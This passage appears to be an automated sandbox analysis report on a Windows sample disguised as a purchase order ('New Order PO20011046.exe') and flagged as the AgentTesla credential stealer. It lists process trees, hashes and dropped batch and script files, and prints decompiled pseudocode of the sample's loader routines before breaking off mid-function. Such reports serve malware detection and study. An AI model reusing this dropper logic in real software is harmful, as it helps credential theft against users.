                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 6960 Parent PID: 6700

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: conhost.exe PID: 6952 Parent PID: 6960

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 4476 Parent PID: 6700

                                                                                                          General

                                                                                                          Start time:10:28:27
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: conhost.exe PID: 5952 Parent PID: 4476

                                                                                                          General

                                                                                                          Start time:10:28:28
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: Evvudrv.exe PID: 5488 Parent PID: 3424

                                                                                                          General

                                                                                                          Start time:10:28:35
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 69%, ReversingLabs

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: Evvudrv.exe PID: 4868 Parent PID: 3424

                                                                                                          General

                                                                                                          Start time:10:28:43
                                                                                                          Start date:28/11/2020
                                                                                                          Path:C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1311424 bytes
                                                                                                          MD5 hash:310A7CA550B9997D0E0BCAF645530303
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi

                                                                                                          Chronological Activities

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >

                                                                                                            Analysis Process: New Order PO20011046.exe PID: 7048 Parent PID: 5852 New Order PO20011046.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Non-executed Functions

                                                                                                            Function 02BDA4F4, Relevance: .4, Instructions: 405COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.651419828.0000000002BC0000.00000004.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 317939104f80abfdf5e30a90ff3889e37dbc05892a3eb9f56427ef7cb70f396b
                                                                                                            • Instruction ID: 68183125d34832fd276b80246f8c02ee71c971656cf5a102e69ff79e6f5888e7
                                                                                                            • Opcode Fuzzy Hash: 317939104f80abfdf5e30a90ff3889e37dbc05892a3eb9f56427ef7cb70f396b
                                                                                                            • Instruction Fuzzy Hash: 11E13634A04609DFDB10DFA9C9909AEB7F6EF48304B2586E5E901A7761E734ED81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02BE896C, Relevance: .1, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.651419828.0000000002BC0000.00000004.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce15b72c0ec80aa4f1425314821ecd01fa30d8155a94511a65b21c6b66bde3ca
                                                                                                            • Instruction ID: b4e04e8e08c9e0e27cf11d76050a001ccc9070a9a1f6f89b3217fe696c037751
                                                                                                            • Opcode Fuzzy Hash: ce15b72c0ec80aa4f1425314821ecd01fa30d8155a94511a65b21c6b66bde3ca
                                                                                                            • Instruction Fuzzy Hash: 78218174A056099FCF11EFA8E98095EB7F9EB59704B1180F5E855A3360DB30AD008F49
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02BE8C98, Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.651419828.0000000002BC0000.00000004.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 49c2d5ca23b0060dbc721b8883c47d4682d1f6133cb6a91f5ad2fc3400271a14
                                                                                                            • Instruction ID: c64c391b682871618a782a9f5ac6d8ea4b3004aa03aa27dee1e2b8a16cb74bc7
                                                                                                            • Opcode Fuzzy Hash: 49c2d5ca23b0060dbc721b8883c47d4682d1f6133cb6a91f5ad2fc3400271a14
                                                                                                            • Instruction Fuzzy Hash: F6C04846F1AC0106FF288820CA6276E806387D32A1E19B9BA8002F2598D52CCA81000A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02BD63A4, Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.651419828.0000000002BC0000.00000004.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,$0ND$0ND$?
                                                                                                            • API String ID: 0-1964996382
                                                                                                            • Opcode ID: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
                                                                                                            • Instruction ID: 66ce5e881d38354af9355f6ccac32b63814fe3faab1941cea192dcb4a5f3aa20
                                                                                                            • Opcode Fuzzy Hash: 5e7ec865a988939fdc8c258cc47677784f2879ccbc4a969fa65e8338f09fc76f
                                                                                                            • Instruction Fuzzy Hash: 8661BE30A042449BEF20EF79EC8169A7BFABF09314B0884F5E940E725AE735E945CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: svchost.exe PID: 6700 Parent PID: 7048 svchost.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 504853B8, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E504853B8(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char* _v32;
				char _v293;
				long _t58;
				long _t75;
				long _t77;
				CHAR* _t84;
				CHAR* _t87;
				struct HINSTANCE__* _t110;
				intOrPtr _t115;
				void* _t124;
				void* _t126;
				intOrPtr _t127;

				_t124 = _t126;
				_t127 = _t126 + 0xfffffedc;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v293, 0x105);
				_v22 = 0;
				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t58 == 0) {
					L3:
					_push(_t124);
					_push(0x504854bc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t127;
					_v28 = 5;
					E504851E0( &_v293, 0x105);
					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E50485638, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E504854C3);
					return RegCloseKey(_v12);
				} else {
					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t75 == 0) {
						goto L3;
					} else {
						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t77 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L50481240();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t110 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t84 =  &_v293;
								_push(_t84);
								L50481248();
								_v32 = _t84 +  &_v293;
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t87 =  &_v293;
								if(_t87 != _v32) {
									_v32 = _v32 + 1;
									if(_v22 != 0) {
										_push(0x105 - _v32 - _t87);
										_push( &_v22);
										_push(_v32);
										L50481240();
										_t110 = LoadLibraryExA( &_v293, 0, 2);
									}
									if(_t110 == 0 && _v17 != 0) {
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L50481240();
										_t110 = LoadLibraryExA( &_v293, 0, 2);
										if(_t110 == 0) {
											_v15 = 0;
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L50481240();
											_t110 = LoadLibraryExA( &_v293, 0, 2);
										}
									}
								}
							}
							return _t110;
						} else {
							goto L3;
						}
					}
				}
			}






















                                                                                                            0x504853b9
                                                                                                            0x504853bb
                                                                                                            0x504853c2
                                                                                                            0x504853d3
                                                                                                            0x504853d8
                                                                                                            0x504853f1
                                                                                                            0x504853f8
                                                                                                            0x5048543a
                                                                                                            0x5048543c
                                                                                                            0x5048543d
                                                                                                            0x50485442
                                                                                                            0x50485445
                                                                                                            0x50485448
                                                                                                            0x5048545a
                                                                                                            0x5048547d
                                                                                                            0x5048549d
                                                                                                            0x5048549d
                                                                                                            0x504854a1
                                                                                                            0x504854a7
                                                                                                            0x504854aa
                                                                                                            0x504854ad
                                                                                                            0x504854bb
                                                                                                            0x504853fa
                                                                                                            0x5048540f
                                                                                                            0x50485416
                                                                                                            0x00000000
                                                                                                            0x50485418
                                                                                                            0x5048542d
                                                                                                            0x50485434
                                                                                                            0x504854c3
                                                                                                            0x504854cb
                                                                                                            0x504854d2
                                                                                                            0x504854d3
                                                                                                            0x504854e6
                                                                                                            0x504854eb
                                                                                                            0x504854f4
                                                                                                            0x5048550a
                                                                                                            0x50485510
                                                                                                            0x50485511
                                                                                                            0x5048551e
                                                                                                            0x50485526
                                                                                                            0x50485523
                                                                                                            0x50485523
                                                                                                            0x50485539
                                                                                                            0x50485542
                                                                                                            0x50485548
                                                                                                            0x5048554f
                                                                                                            0x5048555d
                                                                                                            0x50485561
                                                                                                            0x50485565
                                                                                                            0x50485566
                                                                                                            0x5048557b
                                                                                                            0x5048557b
                                                                                                            0x5048557f
                                                                                                            0x50485599
                                                                                                            0x5048559d
                                                                                                            0x504855a1
                                                                                                            0x504855a2
                                                                                                            0x504855b7
                                                                                                            0x504855bb
                                                                                                            0x504855bd
                                                                                                            0x504855d3
                                                                                                            0x504855d7
                                                                                                            0x504855db
                                                                                                            0x504855dc
                                                                                                            0x504855f1
                                                                                                            0x504855f1
                                                                                                            0x504855bb
                                                                                                            0x5048557f
                                                                                                            0x50485542
                                                                                                            0x504855f9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x50485434
                                                                                                            0x50485416

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,504940C4), ref: 504853D3
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,504940C4), ref: 504853F1
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,504940C4), ref: 5048540F
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 5048542D
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,504854BC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 50485476
                                                                                                            • RegQueryValueExA.ADVAPI32(?,50485638,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,504854BC,?,80000001), ref: 50485494
                                                                                                            • RegCloseKey.ADVAPI32(?,504854C3,00000000,?,?,00000000,504854BC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 504854B6
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 504854D3
                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 504854E0
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 504854E6
                                                                                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 50485511
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 50485566
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 50485576
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 504855A2
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 504855B2
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 504855DC
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 504855EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                            • Opcode ID: 611a220818add07b176bb9be6327b314c3ca5f9b8d84e3184ae8ab43326015fe
                                                                                                            • Instruction ID: 53e8be25585b249845e271e0f86491468c420df7381b03017a6e22cbed27f998
                                                                                                            • Opcode Fuzzy Hash: 611a220818add07b176bb9be6327b314c3ca5f9b8d84e3184ae8ab43326015fe
                                                                                                            • Instruction Fuzzy Hash: E6614F71E042497EEB10CAE4CC55FEFB7BD9F18304F404AA6A605E6181DBBC9A448BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 504854C3, Relevance: 15.1, APIs: 10, Instructions: 101stringlibrarythreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E504854C3() {
				void* _t42;
				void* _t45;
				struct HINSTANCE__* _t67;
				void* _t76;

				_push(0x105);
				_push( *((intOrPtr*)(_t76 - 4)));
				_push(_t76 - 0x121);
				L50481240();
				GetLocaleInfoA(GetThreadLocale(), 3, _t76 - 0xd, 5); // executed
				_t67 = 0;
				if( *(_t76 - 0x121) == 0 ||  *(_t76 - 0xd) == 0 &&  *((char*)(_t76 - 0x12)) == 0) {
					L14:
					return _t67;
				} else {
					_t42 = _t76 - 0x121;
					_push(_t42);
					L50481248();
					 *((intOrPtr*)(_t76 - 0x1c)) = _t42 + _t76 - 0x121;
					L5:
					if( *((char*)( *((intOrPtr*)(_t76 - 0x1c)))) != 0x2e && _t76 - 0x121 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
						goto L5;
					}
					_t45 = _t76 - 0x121;
					if(_t45 !=  *((intOrPtr*)(_t76 - 0x1c))) {
						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
						if( *((char*)(_t76 - 0x12)) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t45);
							_push(_t76 - 0x12);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L50481240();
							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
						}
						if(_t67 == 0 &&  *(_t76 - 0xd) != 0) {
							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
							_push(_t76 - 0xd);
							_push( *((intOrPtr*)(_t76 - 0x1c)));
							L50481240();
							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
							if(_t67 == 0) {
								 *((char*)(_t76 - 0xb)) = 0;
								_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
								_push(_t76 - 0xd);
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								L50481240();
								_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
							}
						}
					}
					goto L14;
				}
			}







                                                                                                            0x504854c3
                                                                                                            0x504854cb
                                                                                                            0x504854d2
                                                                                                            0x504854d3
                                                                                                            0x504854e6
                                                                                                            0x504854eb
                                                                                                            0x504854f4
                                                                                                            0x504855f3
                                                                                                            0x504855f9
                                                                                                            0x5048550a
                                                                                                            0x5048550a
                                                                                                            0x50485510
                                                                                                            0x50485511
                                                                                                            0x5048551e
                                                                                                            0x50485526
                                                                                                            0x5048552c
                                                                                                            0x50485523
                                                                                                            0x00000000
                                                                                                            0x50485523
                                                                                                            0x50485539
                                                                                                            0x50485542
                                                                                                            0x50485548
                                                                                                            0x5048554f
                                                                                                            0x5048555d
                                                                                                            0x50485561
                                                                                                            0x50485565
                                                                                                            0x50485566
                                                                                                            0x5048557b
                                                                                                            0x5048557b
                                                                                                            0x5048557f
                                                                                                            0x50485599
                                                                                                            0x5048559d
                                                                                                            0x504855a1
                                                                                                            0x504855a2
                                                                                                            0x504855b7
                                                                                                            0x504855bb
                                                                                                            0x504855bd
                                                                                                            0x504855d3
                                                                                                            0x504855d7
                                                                                                            0x504855db
                                                                                                            0x504855dc
                                                                                                            0x504855f1
                                                                                                            0x504855f1
                                                                                                            0x504855bb
                                                                                                            0x5048557f
                                                                                                            0x00000000
                                                                                                            0x50485542

                                                                                                            APIs
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 504854D3
                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 504854E0
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 504854E6
                                                                                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 50485511
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 50485566
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 50485576
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 504855A2
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 504855B2
                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 504855DC
                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 504855EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.768259612.0000000050480000.00000040.00000001.sdmp, Offset: 50480000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                            • Opcode ID: 1377a7d09fce3b85fd63f489c0335a30ad4507ac5eb008f37fdc8d6331bdb045
                                                                                                            • Instruction ID: 200f89ff015b6324bed6aa9f95e7d12cc3f8216f7e9613b94f5b96b970f64c06
                                                                                                            • Opcode Fuzzy Hash: 1377a7d09fce3b85fd63f489c0335a30ad4507ac5eb008f37fdc8d6331bdb045
                                                                                                            • Instruction Fuzzy Hash: 17317071E042497EEB11CAE8C885FDFB7BDAF58304F444AA6A245E2184DBBCDE458B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 50492EF0, Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 295COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			_entry_(void* __ebx, void* __edx, void* __esi) {
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v116;
				char _v120;
				char _v124;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				void* _t88;
				void* _t90;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr _t103;
				intOrPtr _t109;
				intOrPtr _t115;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t137;
				void* _t145;
				intOrPtr* _t151;
				intOrPtr* _t153;
				intOrPtr* _t155;
				intOrPtr _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				intOrPtr _t173;
				intOrPtr _t177;
				intOrPtr* _t191;
				intOrPtr* _t193;
				intOrPtr* _t195;
				intOrPtr _t198;
				intOrPtr _t200;
				void* _t201;
				void* _t205;
				void* _t211;
				intOrPtr _t216;
				intOrPtr _t225;
				intOrPtr _t233;
				intOrPtr _t254;
				intOrPtr _t260;
				intOrPtr _t267;
				intOrPtr _t273;
				intOrPtr _t280;
				intOrPtr _t284;
				intOrPtr _t285;

				_t284 = _t285;
				_t211 = 0x12;
				do {
					_push(0);
					_push(0);
					_t211 = _t211 - 1;
				} while (_t211 != 0);
				_push(_t211);
				E50485FD0(0x50492e64);
				_push(_t284);
				_push(0x504936dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t285;
				E5048404C(0x50492ee4);
				_t233 =  *0x50494780; // 0x808fa4
				E50484500( &_v72, _t233);
				E5048C030(_v72,  &_v68);
				_push(_v68);
				_push(0x504936f4);
				_push("AppData\\Local");
				E504845D4();
				E50492D48(5, __ebx, _t211,  &_v76, __esi);
				E504842CC(0x504959d0, _v76);
				_push("C:\\Users\\Public\\");
				_push( *0x504959d0);
				_push(".bat");
				E504845D4();
				E50484470(0x504959e8, E50484714(_v80));
				_push("C:\\Users\\Public\\");
				_push( *0x504959d0);
				_push("tso.bat");
				E504845D4();
				E50484470(0x504959ec, E50484714(_v84));
				_push("C:\\Users\\Public\\");
				_push( *0x504959d0);
				_push("Rer.bat");
				E504845D4();
				E50484470(0x504959f0, E50484714(_v88));
				_push("C:\\Users\\Public\\");
				_push( *0x504959d0);
				_push("hcc.bat");
				E504845D4();
				E50484470(0x504959d4, E50484714(_v92));
				_push("C:\\Users\\Public\\");
				_push( *0x504959d0);
				_push("cvb.vbs");
				E504845D4();
				E50484470(0x504959dc, E50484714(_v96));
				_t88 = E5048779C("C:\\Windows\\Finex");
				_t287 = _t88;
				if(_t88 != 0) {
					Sleep(0x2710); // executed
					_t90 = E5048779C("C:\\Windows\\Finex");
					__eflags = _t90;
					if(_t90 != 0) {
						_t91 =  *0x504959e8; // 0x6b80688
						E50484470( &_v132, E50484714(_t91));
						E504877C0(_v132);
						_t97 =  *0x504959f0; // 0x6b80734
						E50484470( &_v136, E50484714(_t97));
						E504877C0(_v136);
						_t103 =  *0x504959f4; // 0x0
						E50484470( &_v140, E50484714(_t103));
						E504877C0(_v140);
						_t109 =  *0x504959ec; // 0x6b806dc
						E50484470( &_v144, E50484714(_t109));
						E504877C0(_v144);
						_t115 =  *0x504959d4; // 0x6b8078c
						E50484470( &_v148, E50484714(_t115));
						E504877C0(_v148);
						_t121 =  *0x504959dc; // 0x6b807e4
						E50484470( &_v152, E50484714(_t121));
						E504877C0(_v152);
						ExitProcess(0); // executed
						__eflags = 0;
						_pop(_t254);
						 *[fs:eax] = _t254;
						_push(0x504936e4);
						return E5048429C( &_v152, 0x16);
					} else {
						E50484368(0x504959e4, 0x10f, 0x504943cc);
						_t133 =  *0x504959e0; // 0x6b80600
						E50484470( &_v120, E50484714(_t133));
						_t137 =  *0x504959e4; // 0x6b815f4
						E50492C24(_t137, __ebx, _v120, 0x504937a0, __esi,  &_v116);
